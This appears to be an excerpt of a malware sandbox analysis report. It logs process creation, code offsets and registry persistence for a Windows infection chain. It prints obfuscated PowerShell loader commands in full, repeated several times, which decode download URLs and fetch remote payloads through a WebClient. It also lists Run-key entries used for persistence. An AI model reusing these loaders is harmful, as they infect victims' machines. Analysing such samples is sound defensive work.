              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.nJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,16_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0466E3B0 push eax; retf 6_2_0466E3B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0466B228 pushad ; ret 6_2_0466B235
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0466B2BF push eax; ret 6_2_0466B2C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_046633D5 push eax; retf 6_2_046633F9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0466FE02 push esp; retf 6_2_0466FE09
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_073C0638 push eax; mov dword ptr [esp], ecx6_2_073C0AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_073C0AAC push eax; mov dword ptr [esp], ecx6_2_073C0AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_073CF8A0 pushfd ; iretd 6_2_073CF8A1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D601D5 push ecx; ret 6_2_09D601D6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D641F5 push esp; ret 6_2_09D641F6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D641E4 push ecx; ret 6_2_09D641EA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D62DE2 push ecx; ret 6_2_09D62DEA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D65197 push edx; ret 6_2_09D651C6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D62993 push eax; ret 6_2_09D629BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D60185 push eax; ret 6_2_09D60186
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D649B0 push eax; ret 6_2_09D649B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D625AC push eax; ret 6_2_09D625AE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D609AD push es; ret 6_2_09D609B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D6415B push eax; ret 6_2_09D64162
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D62147 push eax; ret 6_2_09D62172
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D6354B push eax; ret 6_2_09D63552
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D63D49 push eax; ret 6_2_09D63D52
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D6491D push eax; ret 6_2_09D64932
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D60118 push esp; ret 6_2_09D6011E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D61101 push esp; ret 6_2_09D61102
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D6050F push eax; ret 6_2_09D60522
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D6550B push ecx; ret 6_2_09D65512
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D65131 push esp; ret 6_2_09D65132
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D64D26 push eax; ret 6_2_09D64D2E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D65125 push eax; ret 6_2_09D65126
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09D600D3 push esp; ret 6_2_09D600E2

              Boot Survival

              barindex
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ArgumentlistensJump to behavior
              Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LZ0PTDW
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ArgumentlistensJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ArgumentlistensJump to behavior
              Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LZ0PTDW
              Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LZ0PTDW
